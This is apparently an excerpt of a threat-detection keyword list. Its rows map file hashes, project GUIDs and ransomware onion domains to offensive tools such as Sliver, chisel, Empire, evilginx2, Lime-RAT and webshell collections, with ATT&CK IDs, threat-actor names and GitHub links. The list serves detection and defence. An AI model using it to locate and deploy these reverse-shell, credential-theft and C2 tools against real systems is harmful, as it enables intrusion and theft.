"*6dtxgqam4crv6rr6.onion.link*",".{0,1000}6dtxgqam4crv6rr6\.onion\.link.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28588" "*6dtxgqam4crv6rr6.onion.to*",".{0,1000}6dtxgqam4crv6rr6\.onion\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28589" 
"*6dtxgqam4crv6rr6.tor2web.org*",".{0,1000}6dtxgqam4crv6rr6\.tor2web\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28590" "*6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329*",".{0,1000}6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#filehash","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","28591" "*6e058a47fb0c4d8d6aa409451c6d5491999caee95ae7a3e50ead61d8425272ba*",".{0,1000}6e058a47fb0c4d8d6aa409451c6d5491999caee95ae7a3e50ead61d8425272ba.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","28592" "*6e0737510e4601410e0312c6d1f8d3d98c79536952abc4fab0df75f490ec7f78*",".{0,1000}6e0737510e4601410e0312c6d1f8d3d98c79536952abc4fab0df75f490ec7f78.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28593" "*6e08212071f8b95216a56d0a5edef8fbf23cd33f212762a236060c486f9319d0*",".{0,1000}6e08212071f8b95216a56d0a5edef8fbf23cd33f212762a236060c486f9319d0.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","28594" "*6E0D8D5C-7B88-4C77-A347-34F8B0FD2D75*",".{0,1000}6E0D8D5C\-7B88\-4C77\-A347\-34F8B0FD2D75.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28595" "*6e11cfde1949b9171ce570ae5e3b8a7840f12f8f24781c2b3ac37d88627d82ba*",".{0,1000}6e11cfde1949b9171ce570ae5e3b8a7840f12f8f24781c2b3ac37d88627d82ba.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28596" "*6e142c61b60e8590454a4ce20a8190bf07119ad5843457c9a46205ebea284fb3*",".{0,1000}6e142c61b60e8590454a4ce20a8190bf07119ad5843457c9a46205ebea284fb3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28598" 
"*6e1611b4524f7426cbd8d7351b269a1239ee710e575e9e460fce110c35962de6*",".{0,1000}6e1611b4524f7426cbd8d7351b269a1239ee710e575e9e460fce110c35962de6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28599" "*6e1a521508f6fe6ebccc04a17b5976aff8e68f49dd281edada1f68f109116d52*",".{0,1000}6e1a521508f6fe6ebccc04a17b5976aff8e68f49dd281edada1f68f109116d52.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","28600" "*6e24ebb4b88122fe10261cb8cf32f92c812690c49aea29f2d708557ea5feb186*",".{0,1000}6e24ebb4b88122fe10261cb8cf32f92c812690c49aea29f2d708557ea5feb186.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28602" "*6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F*",".{0,1000}6E25C93C\-0985\-4D6E\-A4C3\-89D10F4F4F5F.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - 
T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","28603" "*6E383DE4-DE89-4247-A41A-79DB1DC03AAA*",".{0,1000}6E383DE4\-DE89\-4247\-A41A\-79DB1DC03AAA.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","#GUIDproject","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","28606" "*6e50021a61b3fb16c39a89ae4e7a5c183c2d85012597911f3f405f62bb94026e*",".{0,1000}6e50021a61b3fb16c39a89ae4e7a5c183c2d85012597911f3f405f62bb94026e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28609" "*6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d*",".{0,1000}6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","28611" "*6e5529790d78959b5356c5ad366a91d5d5662267ac1e78eeb33498557efc90a6*",".{0,1000}6e5529790d78959b5356c5ad366a91d5d5662267ac1e78eeb33498557efc90a6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28612" "*6e5cbf14240bc5d146d5516257163145cba176066d6c43d55d757101c2517587*",".{0,1000}6e5cbf14240bc5d146d5516257163145cba176066d6c43d55d757101c2517587.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28613" "*6e6f927544ef90a50ee0fc7de48b67a84ab3081ddac08a4872ba922e718be330*",".{0,1000}6e6f927544ef90a50ee0fc7de48b67a84ab3081ddac08a4872ba922e718be330.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","28615" "*6e7645c4-32c5-4fe3-aabf-e94c2f4370e7*",".{0,1000}6e7645c4\-32c5\-4fe3\-aabf\-e94c2f4370e7.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","0","#GUIDproject","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","28616" "*6e7d2c54b036019f32df4238d9f26e97efe246df82c687ee8033c7c9fe5a9f09*",".{0,1000}6e7d2c54b036019f32df4238d9f26e97efe246df82c687ee8033c7c9fe5a9f09.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","28617" "*6e8b43f3e3287e95a7e9debd065e5915d9a557b1c8191d388939fb1169c79041*",".{0,1000}6e8b43f3e3287e95a7e9debd065e5915d9a557b1c8191d388939fb1169c79041.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28619" "*6E8D2C12-255B-403C-9EF3-8A097D374DB2*",".{0,1000}6E8D2C12\-255B\-403C\-9EF3\-8A097D374DB2.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","#GUIDproject","N/A","10","9","868","140","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z","28621" "*6e909861781a8812ee01bc59435fd73fd34da23fa9ad6d699eefbf9f84629876*",".{0,1000}6e909861781a8812ee01bc59435fd73fd34da23fa9ad6d699eefbf9f84629876.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28622" "*6e92e67cb6ae23615bdaf6e2f238e9d99a3fbba4ab3f9118f2a53b73302c2c97*",".{0,1000}6e92e67cb6ae23615bdaf6e2f238e9d99a3fbba4ab3f9118f2a53b73302c2c97.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","28623" "*6e97ff7ed0f51797300080bd5b39662c9b78693b54f7b3bb3da80b3be20cf076*",".{0,1000}6e97ff7ed0f51797300080bd5b39662c9b78693b54f7b3bb3da80b3be20cf076.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","28624" "*6e9cafc470be9e0db016266a1e663e39d0c764649629a6d0e28c18f103b67a43*",".{0,1000}6e9cafc470be9e0db016266a1e663e39d0c764649629a6d0e28c18f103b67a43.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack 
framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","28625" "*6e9f98db374c8bbf0dedd27e6576c3bc8d800465afef91b99220c85401cc4e4c*",".{0,1000}6e9f98db374c8bbf0dedd27e6576c3bc8d800465afef91b99220c85401cc4e4c.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28626" "*6ea5ef1dadc07545a736c48425df63f6d95abd70ff2bd41975948cd5ad5e5788*",".{0,1000}6ea5ef1dadc07545a736c48425df63f6d95abd70ff2bd41975948cd5ad5e5788.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28628" "*6eab9e77c73f2eedae88d1b7cc7b7f2b5f23dc5c7a6110a50a1167ccfcb53769*",".{0,1000}6eab9e77c73f2eedae88d1b7cc7b7f2b5f23dc5c7a6110a50a1167ccfcb53769.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28630" "*6eabbccdf8fe27c93e5a87899fd2ef81bf1670ab65103b999559266d936acea3*",".{0,1000}6eabbccdf8fe27c93e5a87899fd2ef81bf1670ab65103b999559266d936acea3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28631" "*6eac306cec3650ed8740d82024380ccaaea2ac4b8f6b55119a9e5fb82485f67f*",".{0,1000}6eac306cec3650ed8740d82024380ccaaea2ac4b8f6b55119a9e5fb82485f67f.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","0","#filehash","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","28632" "*6EB55FE6-C11C-453B-8B32-22B689B6B3E2*",".{0,1000}6EB55FE6\-C11C\-453B\-8B32\-22B689B6B3E2.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - 
T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","#GUIDproject","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","28633" "*6ec25122b3ffbf7f7dfcc44141b5e8df729a9bdde5ae169275d8fe75b0ea486f*",".{0,1000}6ec25122b3ffbf7f7dfcc44141b5e8df729a9bdde5ae169275d8fe75b0ea486f.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","28636" "*6ec665b1a7a7d7a63f8c92469d8bdd3365a8b98fe5f8093112cdfe2887a3a9c2*",".{0,1000}6ec665b1a7a7d7a63f8c92469d8bdd3365a8b98fe5f8093112cdfe2887a3a9c2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28637" "*6ecb62923d16588654c77ad581388eb27873b09c2ff642cd8303c8a2d577fe53*",".{0,1000}6ecb62923d16588654c77ad581388eb27873b09c2ff642cd8303c8a2d577fe53.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - 
T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","28639" "*6ed116ea8ed867e975f1563cd931fb3b28931a66d8e5548c3ee8fdb58faf538e*",".{0,1000}6ed116ea8ed867e975f1563cd931fb3b28931a66d8e5548c3ee8fdb58faf538e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28640" "*6ed65758ecfa41680c567082d18526278b6e446b37046b578c6b1bf531d81f59*",".{0,1000}6ed65758ecfa41680c567082d18526278b6e446b37046b578c6b1bf531d81f59.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential 
Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","28641" "*6ee3947419cd0fef3a7f1a91c44563880eeaba7103092803aac28814ad0df101*",".{0,1000}6ee3947419cd0fef3a7f1a91c44563880eeaba7103092803aac28814ad0df101.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","28646" "*6ee4bce37718d56dc3171c02415b0163d68d808342e5c0ba15851f6e48e77420*",".{0,1000}6ee4bce37718d56dc3171c02415b0163d68d808342e5c0ba15851f6e48e77420.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","28647" "*6ee5c663c74ab36046c1648d2ccc825c67e5d0104da08152d3d49f3482499567*",".{0,1000}6ee5c663c74ab36046c1648d2ccc825c67e5d0104da08152d3d49f3482499567.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28648" 
"*6eebfee28898a816e8f645da2d5e7a2f7dcc584997eb667f909e386bd3389fe7*",".{0,1000}6eebfee28898a816e8f645da2d5e7a2f7dcc584997eb667f909e386bd3389fe7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28651" "*6ef0e134f1bf610e27cf4c99c2402bd74d00ea214cb6aa34daf4e99cfa66270a*",".{0,1000}6ef0e134f1bf610e27cf4c99c2402bd74d00ea214cb6aa34daf4e99cfa66270a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28652" 